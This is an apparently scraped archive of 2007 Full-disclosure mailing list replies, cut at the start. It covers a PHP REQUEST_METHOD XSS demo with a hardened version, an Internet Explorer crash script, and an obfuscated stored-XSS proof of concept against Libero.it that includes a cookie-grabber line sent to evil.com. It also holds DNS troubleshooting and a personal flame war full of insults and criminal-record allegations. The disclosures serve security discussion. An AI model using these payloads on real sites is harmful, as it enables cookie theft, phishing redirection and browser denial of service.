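            header('Allow: ' . implode(', ', ALLOWED_METHODS));
        }
        return '<p>405 Method Not Allowed</p>';
    }
    $page = (string)($get['page'] ?? '');
    return '<p>' . h($method) . ' ' . h($page) . '</p>';
}

// Constructed inputs mirroring the thread's examples (not captured traffic).
$samples = [
    ['GET',                                          'news'],
    ['GET<script>alert(document.cookie);</script>', '<b>blah</b>'],
    ['PROPFIND',                                     'news'],   // valid WebDAV token, but not handled here
];

foreach ($samples as [$method, $page]) {
    $server = ['REQUEST_METHOD' => $method];
    $get    = ['page' => $page];
    printf("method token? %-3s | vulnerable: %s\n",
           is_http_token($method) ? 'yes' : 'no', render_vulnerable($server, $get));
    printf("                   hardened:   %s\n\n", render_hardened($server, $get));
}
```

The token check shows what Richard Moore's "single alphanumeric string" restriction at the HTTPD would catch; the PROPFIND case shows why the script still needs its own allow-list even when the method is well-formed.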

Re: [Full-disclosure] Apache/PHP REQUEST_METHOD XSS Vulnerability

2007-04-23 Thread Kradorex Xeron
This is a case of poor programming on the script coder's part; it is not so 
much a vulnerability.

That variable only contains what it is sent by Apache. It doesn't parse it, 
nor is it supposed to. If you want to ensure there is no XSS going on, parse 
the variable, escape characters, etc., as it IS user input.

This CAN be a vulnerability with individual scripts, however, it is not a vuln 
with PHP or Apache.

On Monday 23 April 2007 17:31, Michal Majchrowicz wrote:
 There exists a flaw in the way the Apache and PHP combination handles the
 $_SERVER array.
 If the programmer writes a script like this:
 <?php
   echo $_SERVER['REQUEST_METHOD'];
 ?>
 He will assume that REQUEST_METHOD can only be: GET,POST,OPTIONS,TRACE
 and all that stuff. However this is not true, since Apache accepts
 requests that look like this:
 GET<script>alert(document.coookie);</script> /test.php HTTP/1.0
 And the output for this would be:
 GET<script>alert(document.coookie);</script>
 Of course it is hard to exploit (I think some Flash might help ;)) and
 I don't know if it is exploitable at all. But programmers should be
 warned about this behaviour. You can't trust any variable in the
 $_SERVER table!
 Regards Michal Majchrowicz.



Re: [Full-disclosure] Internet Explorer Crash

2007-04-18 Thread Kradorex Xeron
This also works under Konqueror.

There should be an implementation on ALL browsers that a loop so large is 
unacceptable, and they should refuse to even run it. There is no viable reason 
for a client-side script to run a loop through so many iterations.

This DoS technique could be abused, and iframes with the code could be 
embedded within popular websites, effectively causing a denial of service to 
that specific site.


On Tuesday 17 April 2007 13:09, J. Oquendo wrote:
 Product: Internet Explorer Version 7.0.5730.11
 Impact: Browser crash possibly more
 Author: Jesus Oquendo
 echo @infiltrated|sed 's/^/sil/g;s/$/.net/g'


 I. BACKGROUND
 Why bother? Who doesn't know what Internet Explorer and Microsoft are.

 II. DESCRIPTION
 IE 7 is vulnerable to a script which causes the browser to hang. The
 memory and CPU usage go through the roof. Originally the script caused
 (and still causes) Safari and Konqueror to crash.

 III SOLUTION
 Stop using Microsoft products or deal with a new advisory every other
 day.

 IV. Proof
 http://www.infiltrated.net/stupidInternetExploder.html

 V. Code

 $ more /stupidInternetExploder.html

 <script>

 var reg = /(.)*/;

 var z = 'Z';
 while (z.length <= 999999999999999999999999999) z+=z; var boum = reg.exec(z);

 </script>

 Goodbye


 J. Oquendo
 http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
 sil . infiltrated @ net http://www.infiltrated.net

 The happiness of society is the end of government.
 John Adams



Re: [Full-disclosure] Another XSS vulnerability in Italian provider Libero.it

2007-03-29 Thread Kradorex Xeron
They probably need to redo their entire site's scripts; I wouldn't doubt 
there are a few more exploits in there somewhere. -- 2+ exploits within one 
site in one month is pretty sad.

On Wednesday 28 March 2007 12:17, LK wrote:
 After the report of Rosario Valotta on this ML, another XSS vulnerability
 has been found on Libero.it, one of the most important Italian ISPs
 (www.libero.it).

 Nothing more than a trivial error but, since Libero.it staff used the
 printed media to inform that Rosario's find was just a spot issue, it is
 important to demonstrate that this kind of error is quite a bit more
 widespread and to let the Libero staff and management realize that a
 potential attack must be avoided by a deep check of the portal.

 The vulnerability once again can be found in the Community section
 of Libero portal, and the affected functionality is the profile
 creation and retrieval

 http://digiland.libero.it/profilo.phtml?nick=XssForFun&top=1.

 The implementation of this functionality allows the injection of
 malicious code in the profile, so that an attacker by visiting his/her
 profile can:

 1) steal username (in cookie)
 2) steal cookies
 3) arbitrary redirection for Phishing purpose

 The normal URL would be something linked like this:

 http://digiland.libero.it/profilo.phtml?nick=Nick&top=1

 where Nick is the name of the nick whose profile has been
 manipulated or crafted to add arbitrary code.

 This vulnerability closely resembles those in MySpace and other
 communities.
 So it's nothing really complicated and you can skip on from here on ;)

 In admin pages (need to be logged by creating a fake account) on page

 http://digiland.libero.it/profilo_add.php?nocache=1175076655

 there are two different fields named I miei difetti: (my defects)
 and i miei pregi: (my strong points) that accept arbitrary content.

 As stated by Rosario, the Libero.it web application performs a simple
 parsing of the posted content, so that quote and double-quote (' and ")
 chars are escaped by putting a \ before them (both using ASCII and URL
 encoding).

 While I already had the Rosario's beautiful implementation of a simple
 evasion technique I preferred to encode the single char in an old
 snippet of mine.
 The aim of the snippet (I don't remember if I made it, stole it, stole
 only the main idea or where, sorry)  is to transform a string into a
 series of char numbers to be used with a String.fromCharCode command.
 Due to the limitation in size, the function which creates the
 String.fromCharCode sequence is detached and the ASCII value is
 decreased by 100 to limit the number of digits.
 This is the creation snippet:

  <script>
  var toBenc = "http://www.lastknight.com";
  var result = "";

  for (var k = 0; k < toBenc.length; k++)
  {
  result += "e(" + (toBenc.charCodeAt(k) - 100) + ")+";
  }

  document.write(result + "<br>")
  </script>

  So URL "http://www.lastknight.com" is rendered as:

 e(4)+e(16)+e(16)+e(12)+e(-42)+e(-53)+e(-53)+e(19)+e(19)
 +e(19)+e(-54)+e(8)+e(-3)+e(15)+e(16)+e(7)+e(10)+e(5)+e(3)
 +e(4)+e(16)+e(-54)+e(-1)+e(11)+e(9);


 Using the two boxes we can use the following code for a POC:

  [BOX 1]
  script
  function e(A) {
   return String.fromCharCode(A + 100)
  }
  alert(document.cookie);
  /script

  [BOX 2]
  script
  var k =
  e(4)+e(16)+e(16)+e(12)+e(-42)+e(-53)+e(-53)+e(19)+e(19)+e(19)+e(-54)+e(8);
  k +=
  e(-3)+e(15)+e(16)+e(7)+e(10)+e(5)+e(3)+e(4)+e(16)+e(-54)+e(-1)+e(11)+e(9);
  alert(k);
  window.location = k;
  /script

 The posting url can be easily modified to an http grabber such as:

  "http://evil.com/grab?c="+encodeURI(document.cookie);

 or (much more dangerous) to a phishing site.

 Session Riding and derived problems have not been tested but many Italian
 security experts are working on it.

 A POC url is available (until not deleted) here:

 http://digiland.libero.it/profilo.phtml?nick=XssForFun&top=1

 Just my 2 cents and thanks to:

 Rosario Valotta for the first report, upon which this is based
 SharDick for help in JS ;)
 Vokda  Zen for consultancy and typo-killing ;)


 Greetings,

 MgpF


 Permanent Url: http://www.lastknight.com/libero-xss/



Re: [Full-disclosure] RainbowCrack-Online Drama

2007-03-28 Thread Kradorex Xeron
Is this an advertizement, an insult, an invite, or what? :P

On Tuesday 27 March 2007 11:52, T Biehn wrote:
 It gets juicier:

 -- Forwarded Message: --
 From: John Harrison [EMAIL PROTECTED]
 To: Travis [EMAIL PROTECTED]
 Subject: LIES From the Canadian Bomb Boy
 Date: Mon, 26 Mar 2007 21:16:02 +

  http://seclists.org/fulldisclosure/2007/Mar/0462.html
 
 
  Well you missed the criminal charges and subsequent guilty verdict and
  the fact your parents had massive legal bills

 **I didn't think it was relevant.

  you really think that iRainbowcrack wants to be associated with a person
  so anti

 **iPod?

  USA ..and a danger to school kids

 **you were more than happy to accommodate me when you needed things right?

  you have history of Bomb Charges , that is not wanted at
  Rainbowcrack-online

 **I bet.

  i wondered why the surname was missed out in that first article , Travis
  who didnt want to give his surname  WHATA DICK U ARE

 **Mommy and daddy told me not to give out my last name, you also didn't
 want it.

  Seventeen year old Travis Biehn was arrested last week and charged with
  making a terrorist threat against
  his Philadelphia area high school. It is alleged that the Grade 11
  student scrawled a threat on a washroom
  wall of Central Bucks East High School and then brought it to the
  attention of some teachers. Biehn's home
   was searched after other students told the authorities that the teen had
  told them that he knew how to
   make a bomb and was planning to use one. The search of his home revealed
  eight to ten pounds of
  potassium nitrate, fuses, detonators, and canisters as well as
  photographs of bomb-making material

 **See text of appeal / science to see that it wouldn't have made a bomb
 anyways

  guess we start there
 
  and then a nice pic of u  i think
  http://www.recorder.ca/cp/World/050614/w0614109A.html

 **What a hottie, where's your pic?

   oh and an attachment of the threats to take the site down which u tried
  to make it so that we couldnt
  do a thing without you agreeing , not bad for such an idle fook , your a
  waste of space dude , i hear your druggie voice , hope you aint any at
  home

 **You mean my requests that you adhere to the contract I got you to agree
 to? And upon breach my legitimate removal of copyrighted code?

  and then the best of all , the time you asked me for bots for your KR
  website scam that you couldnt keep quiet about

 **You make it seem like common place that people would just randomly
 ask you for
 such things. I wonder what kind of people you associate with? HACK 4 LYFE.

  damn i finding more logs all the time .i got shit loads on you and the
  great thing is , do uu think ppl will ever do any
  buisness with someone that cannot be trusted ,,i saw right through your
  phoney crap , u didnt like it , well thats my 5% on Travis Bomb Boy Biehn

 **Thats why I've got a decent resume at 18.

  You start a slannging match man , i welcome any chanllenge to the
  legallity of

 **Straight outta Compton...

  RainbowCrack-Online , the website i setup because you were in Jail ,

 **Bought the domain you mean?

  check out the reg date , check out the owners , And you think for 1
  minute that you got a rite to ask me to show you financial shit, you
  copied Daniel Hayes code

 **Actually I had Daniel start me off with some PHP code, he provided me
 with a subscription system he used before, I adopted and extended it for
 rainbowcrack-online. Which means I wrote the entire site, as the most
 recent codebase stands the only thing left of his code is in _ipn.php

  and added your gay name afetr his ,and by the way , google cache aint

 **I do have a gay name =[

  copyrighted even if u do copyrite the code that u didnt right
 
  To sum up you started this , and you aint got a damn clue what you are
  doing , you lie about MY company and you think that no retalliation will
  follow ,

 **You mean sending me incomprehensible e-mails?

  Dude i got shit on you that you would not dream off , and its all logged
  u see i log all msn and archive it ,,

 **Lets hope you don't get raided then. Right johny boy?

  and also MIRC from 5 yrs ago.. I WILL SEND YOU THE TEXT SO U CAN ATTACH
  TO THE RESUME YOU HAVE ON WEB,,, AND I HOPE YOUR EMPLOYERS NOW KNOW

 **Fuck yes, it'll only get me more business.

  YOU WANT SUMMIT IN THIS WORLD ... YOU GOTTA WORK FOR IT ,, NOT TRY TO

 BLACKMAIL

  AFTER YOU SABOTAGE YOUR OWN CODE

 **You mean post this to full disclosure and be completely transparent about
 the whole thing? Also, storing my copyrighted code offsite because I didn't
 trust you enough is not 'sabotage' it's called not being stupid. 

Re: [Full-disclosure] I'm not the only one who can't resolve phishtank.com, but some can..

2007-03-25 Thread Kradorex Xeron
I get a valid answer as well:

Tracing to phishtank.com[a] via 127.0.0.1, maximum of 3 retries
127.0.0.1 (127.0.0.1)
 |\___ auth3.opendns.com [phishtank.com] (208.69.39.2) Got authoritative answer
 |\___ auth2.opendns.com [phishtank.com] (208.67.219.54) Got authoritative answer
  \___ auth1.opendns.com [phishtank.com] (38.99.14.20) Got authoritative answer

auth1.opendns.com (38.99.14.20) phishtank.com -> 66.135.40.79
auth2.opendns.com (208.67.219.54)   phishtank.com -> 66.135.40.79
auth3.opendns.com (208.69.39.2) phishtank.com -> 66.135.40.79


What I'd do is throw it in your hosts file temporarily until DNS behaves.

On Sunday 25 March 2007 15:53, Tim wrote:
 Looks fine for me:

 

 ; <<>> DiG 9.3.4 <<>> phishtank.com
 ;; global options:  printcmd
 ;; Got answer:
 ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 26391
 ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0

 ;; QUESTION SECTION:
 ;phishtank.com.   IN  A

 ;; ANSWER SECTION:
 phishtank.com.42  IN  A   66.135.40.79

 ;; Query time: 4 msec
 ;; SERVER: 10.0.1.1#53(10.0.1.1)
 ;; WHEN: Sun Mar 25 15:49:29 2007
 ;; MSG SIZE  rcvd: 47

 -

 Do some of you happen to have a poisoned MS or Symantec DNS cache
 upstream of you?  (See [1] fmi.)

 tim


 1.  http://www.incidents.org/presentations/dnspoisoning.html



Re: [Full-disclosure] Phishtank.com Gone?

2007-03-25 Thread Kradorex Xeron
I get a valid answer:

; <<>> DiG 9.3.2 <<>> phishtank.com
;; global options:  printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 45905
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 3, ADDITIONAL: 0

;; QUESTION SECTION:
;phishtank.com. IN  A

;; ANSWER SECTION:
phishtank.com.  60  IN  A   66.135.40.79

;; AUTHORITY SECTION:
phishtank.com.  3536IN  NS  auth2.opendns.com.
phishtank.com.  3536IN  NS  auth3.opendns.com.
phishtank.com.  3536IN  NS  auth1.opendns.com.

;; Query time: 42 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Sun Mar 25 15:42:02 2007
;; MSG SIZE  rcvd: 115

What I'd do is throw it in your hosts file temporarily until DNS behaves.

On Sunday 25 March 2007 15:31, Anshuman G wrote:
 Humm,

 Same for me.

 
 [EMAIL PROTECTED]:~ dig phishtank.com | grep A
 ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 32352
 ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2
 ;phishtank.com. IN  A
 ;; ANSWER SECTION:
 phishtank.com.  6352IN  A   127.0.0.1
 ;; AUTHORITY SECTION:
 

 On 3/26/07, Tremaine Lea [EMAIL PROTECTED] wrote:
  On 25-Mar-07, at 12:35 PM, Larry Seltzer wrote:
   Phishtank.com resolves to 127.0.0.1, has someone taken it offline?
  
   No, I'm still getting to the site. I don't suppose mcafee.com,
   symantec.com and a lot of other security domains also resolve to
   127.0.0.1 for you, do they?
  
   Larry Seltzer
 
  It's just phishtank.com for me, the others resolve fine.  My checks
  were run from linux boxes ;)  localhost address checking from Shaw in
  Calgary, normal result checking from an Interland server in the US.
 
  Tremaine Lea
  Network Security Consultant
 


Re: [Full-disclosure] Phishtank.com Gone?

2007-03-25 Thread Kradorex Xeron
I get a valid answer:

phishtank.com.  3   IN  A   66.135.40.79

What I'd do is throw it in your hosts file temporarily until DNS behaves.

On Sunday 25 March 2007 15:31, Anshuman G wrote:
 Humm,

 Same for me.

 
 [EMAIL PROTECTED]:~ dig phishtank.com | grep A
 ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 32352
 ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2
 ;phishtank.com. IN  A
 ;; ANSWER SECTION:
 phishtank.com.  6352IN  A   127.0.0.1
 ;; AUTHORITY SECTION:
 

 On 3/26/07, Tremaine Lea [EMAIL PROTECTED] wrote:
  On 25-Mar-07, at 12:35 PM, Larry Seltzer wrote:
   Phishtank.com resolves to 127.0.0.1, has someone taken it offline?
  
   No, I'm still getting to the site. I don't suppose mcafee.com,
   symantec.com and a lot of other security domains also resolve to
   127.0.0.1 for you, do they?
  
   Larry Seltzer
 
  It's just phishtank.com for me, the others resolve fine.  My checks
  were run from linux boxes ;)  localhost address checking from Shaw in
  Calgary, normal result checking from an Interland server in the US.
 
  Tremaine Lea
  Network Security Consultant
 